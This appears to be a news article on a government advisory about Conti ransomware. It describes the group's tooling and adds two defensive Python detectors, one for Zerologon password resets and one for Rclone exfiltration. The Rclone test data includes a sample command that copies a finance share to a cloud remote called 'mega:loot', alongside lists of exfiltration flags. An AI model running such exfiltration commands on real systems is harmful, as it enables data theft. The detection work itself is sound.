The Conti ransomware operators have been a menace for more than a year, with attacks against health care providers, 911 systems, and many other critical organizations being connected to Conti affiliates in the last few months. Although the group's internal playbook leaked online a few weeks ago, Conti attacks have not slowed down, and the FBI, CISA, and NSA are warning enterprises that the threat from the group continues.
Conti is one of the many ransomware-as-a-service (RaaS) operations that have sprouted up in recent years, and its affiliates have shown a willingness to target virtually any type of organization. Earlier this year, a Conti affiliate compromised Ireland's Health Service Executive, taking down much of the service's infrastructure and forcing the cancellation of appointments and massive care delays. The Irish police later seized some Conti infrastructure, but, like most RaaS groups, Conti runs a distributed operation that the seizure did not fully disrupt.
On Wednesday, the three top federal government agencies that handle cybersecurity issues published a warning about the continued threat from the Conti operation, saying that they have seen more than 400 Conti attacks recently. Conti affiliates use a variety of techniques for gaining initial access to target networks, including phishing campaigns, stolen credentials, and delivery by other malware families already present on the victim's systems. Once inside a network, the actors often use legitimate tools for lateral movement and network inventory, which makes their activity harder to separate from routine administration.
“Conti actors are known to exploit legitimate remote monitoring and management software and remote desktop software as backdoors to maintain persistence on victim networks. The actors use tools already available on the victim network—and, as needed, add additional tools, such as Windows Sysinternals and Mimikatz—to obtain users’ hashes and clear-text credentials, which enable the actors to escalate privileges within a domain and perform other post-exploitation and lateral movement tasks. In some cases, the actors also use TrickBot malware to carry out post-exploitation tasks,” the advisory from CISA, NSA, and FBI says.
The Conti playbook that appeared online a few weeks ago includes quite a bit of detail about the affiliates’ responsibilities, tools to use, and how to find administrator access once they’re on a new network. A translation of the playbook from Russian to English performed by Cisco Talos researchers reveals that the group has a variety of tools and techniques at its disposal.
“The adversaries also included instructions on CVE-2020-1472 Zerologon exploitation in Cobalt Strike. In a previous Ryuk ransomware engagement from Q2 2021, we observed the adversary access several additional resources within that environment and employ a privilege escalation exploit leveraging CVE-2020-1472 to impersonate a domain controller,” Talos researchers said.
“Talos first started observing Ryuk adversaries using the Zerologon privilege-escalation vulnerability in September 2020 and continued updating their attacks on the health care and public health sectors in October. Some researchers have described Conti as the successor to Ryuk.”
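One way to look for the Zerologon (CVE-2020-1472) exploitation the Talos researchers describe is on the domain controller's own Security log. The exploit authenticates to Netlogon from an unauthenticated session and resets the DC's machine-account password, which the DC records as Event ID 4742 ("A computer account was changed") with the subject ANONYMOUS LOGON. The triage logic below is an added example, not code from the advisory or from Talos; the event records are constructed in the flattened key/value shape many SIEM pipelines emit, and the `dc_accounts` set is an assumed input the caller supplies from their own inventory.

```python
"""Triage Windows Security events for signs of CVE-2020-1472 (Zerologon)
exploitation.

Detection idea: a legitimate computer-account password change is performed
either by the machine itself (30-day rotation, Subject == Target) or by an
administrator. A 4742 whose Subject is ANONYMOUS LOGON means an
unauthenticated caller changed a machine account, which is the exploit's
footprint. The sample records below are constructed for this example.
"""

ANONYMOUS = "ANONYMOUS LOGON"

# Constructed sample events (not real logs). Field names follow the
# Security log's event data names; values are flattened to strings.
SAMPLE_EVENTS = [
    # Anonymous caller reset the DC's own account password: exploit signature.
    {"EventID": 4742, "Computer": "DC01.corp.example",
     "SubjectUserName": ANONYMOUS, "SubjectDomainName": "NT AUTHORITY",
     "TargetUserName": "DC01$", "PasswordLastSet": "9/22/2021 10:14:03 PM"},
    # Routine rotation: the workstation changes its own password.
    {"EventID": 4742, "Computer": "DC01.corp.example",
     "SubjectUserName": "WS0042$", "SubjectDomainName": "CORP",
     "TargetUserName": "WS0042$", "PasswordLastSet": "9/22/2021 3:01:44 AM"},
    # Administrator resets a member server's account by hand.
    {"EventID": 4742, "Computer": "DC01.corp.example",
     "SubjectUserName": "jadmin", "SubjectDomainName": "CORP",
     "TargetUserName": "SRV07$", "PasswordLastSet": "9/22/2021 9:40:10 AM"},
    # Anonymous change to a non-DC machine account: still abnormal.
    {"EventID": 4742, "Computer": "DC01.corp.example",
     "SubjectUserName": ANONYMOUS, "SubjectDomainName": "NT AUTHORITY",
     "TargetUserName": "SRV09$", "PasswordLastSet": "9/22/2021 10:15:30 PM"},
    # Unrelated network logon, ignored by the rule.
    {"EventID": 4624, "Computer": "DC01.corp.example",
     "SubjectUserName": "-", "TargetUserName": "jdoe", "LogonType": 3},
]


def triage_event(event, dc_accounts):
    """Return a finding dict for a suspicious 4742, or None.

    dc_accounts: set of domain-controller machine accounts (e.g. {"DC01$"}),
    assumed to be supplied by the caller from their own inventory.
    """
    if event.get("EventID") != 4742:
        return None
    if event.get("SubjectUserName", "").upper() != ANONYMOUS:
        return None
    target = event.get("TargetUserName", "")
    if not target.endswith("$"):          # 4742 targets are machine accounts
        return None
    # "-" in PasswordLastSet means the password attribute was not touched.
    password_changed = event.get("PasswordLastSet", "-") != "-"
    is_dc = target.upper() in {acct.upper() for acct in dc_accounts}
    if is_dc and password_changed:
        severity = "critical"             # DC password reset from a null session
    elif password_changed:
        severity = "high"                 # any machine account reset anonymously
    else:
        severity = "medium"               # anonymous change, password untouched
    return {"computer": event.get("Computer", ""), "target": target,
            "password_changed": password_changed, "severity": severity}


def triage(events, dc_accounts):
    """Run triage_event over a batch and return the findings in log order."""
    findings = (triage_event(e, dc_accounts) for e in events)
    return [f for f in findings if f is not None]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS, dc_accounts={"DC01$"}):
        print(finding)
```

A critical hit is not only a detection but an incident in progress: once the exploit has reset the DC's machine-account password, the DC is left with a password that no longer matches Active Directory, so recovery has to restore that account as well as evict the attacker.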
Conti affiliates also rely on commercially available and open-source tooling rather than custom malware for much of the intrusion, most notably the Cobalt Strike post-exploitation framework, alongside the remote monitoring and remote-desktop software described above.
“Conti actors often use the open-source Rclone command line program for data exfiltration. After the actors steal and encrypt the victim's sensitive data, they employ a double extortion technique in which they demand the victim pay a ransom for the release of the encrypted data and threaten the victim with public release of the data if the ransom is not paid,” the advisory says.
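Because Rclone is a legitimate administration tool, the useful signal is not its presence but how it is invoked: a transfer verb (`copy`, `sync`, `move`) pointed at a cloud remote, often with throughput flags and a private config file, and frequently after the binary has been renamed. The scanner below is an added example, not code from the advisory; it runs over constructed Sysmon Event ID 1 (process creation) records and catches renamed copies through Sysmon's `OriginalFileName` field, which comes from the binary's version resource rather than its on-disk name. The `allowlisted_users` set is an assumed input for accounts whose Rclone use is known and baselined.

```python
"""Flag Rclone-style exfiltration in Sysmon process-creation records.

Scoring: any rclone execution is worth a low-severity note (recon such as
`listremotes`), a transfer verb plus a cloud remote is high, and the same
from a renamed binary is critical. Sample records are constructed.
"""

import re
import shlex

TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Tuning flags that show up in hands-on-keyboard exfiltration; context, not proof.
SUSPICIOUS_FLAGS = {"--transfers", "--ignore-existing", "--no-check-certificate",
                    "--auto-confirm", "--multi-thread-streams", "--config", "--bwlimit"}
# rclone remotes look like "name:path"; reject Windows drive letters such as D:\x.
REMOTE_RE = re.compile(r"^(?![A-Za-z]:(\\|/|$))[\w.-]+:")

# Constructed Sysmon Event ID 1 records (not real logs), reduced to the
# fields the rule needs.
SAMPLE_EVENTS = [
    # Renamed rclone pushing a finance share to a cloud remote with a private config.
    {"EventID": 1, "Image": r"C:\ProgramData\svchost.exe",
     "OriginalFileName": "rclone.exe", "User": "CORP\\admin",
     "CommandLine": r'C:\ProgramData\svchost.exe copy "\\FS01\Finance" mega:loot '
                    r'--transfers 12 --ignore-existing --no-check-certificate '
                    r'--config C:\ProgramData\r.conf'},
    # Baselined backup job: same shape, known account.
    {"EventID": 1, "Image": r"C:\Tools\rclone\rclone.exe",
     "OriginalFileName": "rclone.exe", "User": "CORP\\backup_svc",
     "CommandLine": r"rclone.exe sync D:\Backups offsite:backups --transfers 4"},
    # The real svchost, ignored.
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "OriginalFileName": "svchost.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    # rclone used for reconnaissance of configured remotes.
    {"EventID": 1, "Image": r"C:\Tools\rclone\rclone.exe",
     "OriginalFileName": "rclone.exe", "User": "CORP\\admin",
     "CommandLine": "rclone.exe listremotes"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_process_event(event, allowlisted_users=frozenset()):
    """Return a finding dict for an rclone invocation, or None."""
    if event.get("EventID") != 1:
        return None
    image = _basename(event.get("Image", ""))
    original = event.get("OriginalFileName", "").lower()
    if "rclone" not in image and original != "rclone.exe":
        return None
    renamed = original == "rclone.exe" and image != "rclone.exe"
    user = event.get("User", "")
    if user in allowlisted_users and not renamed:
        return None                      # baselined use under its real name
    # posix=False keeps Windows backslashes literal and leaves quotes on tokens.
    argv = shlex.split(event.get("CommandLine", ""), posix=False)[1:]
    verb = next((t.lower() for t in argv if not t.startswith("-")), None)
    remote = next((t.strip('"') for t in argv if REMOTE_RE.match(t.strip('"'))), None)
    flags = sorted(set(argv) & SUSPICIOUS_FLAGS)
    if verb in TRANSFER_VERBS and remote:
        severity = "critical" if renamed else "high"
    elif renamed:
        severity = "high"
    else:
        severity = "low"
    return {"image": event.get("Image", ""), "user": user, "renamed": renamed,
            "verb": verb, "remote": remote, "flags": flags, "severity": severity}


def scan(events, allowlisted_users=frozenset()):
    """Run analyze_process_event over a batch and keep the findings in order."""
    findings = (analyze_process_event(e, allowlisted_users) for e in events)
    return [f for f in findings if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS, allowlisted_users={"CORP\\backup_svc"}):
        print(finding)
```

The allowlist exists because the honest answer to "is Rclone malicious?" is "it depends on who runs it": a backup account syncing to a known remote looks identical on the command line to an affiliate staging a finance share, so the baseline of expected users and remotes is what turns the rule from noise into a detection. Renamed binaries deliberately bypass the allowlist, since a legitimate job has no reason to hide the tool's name.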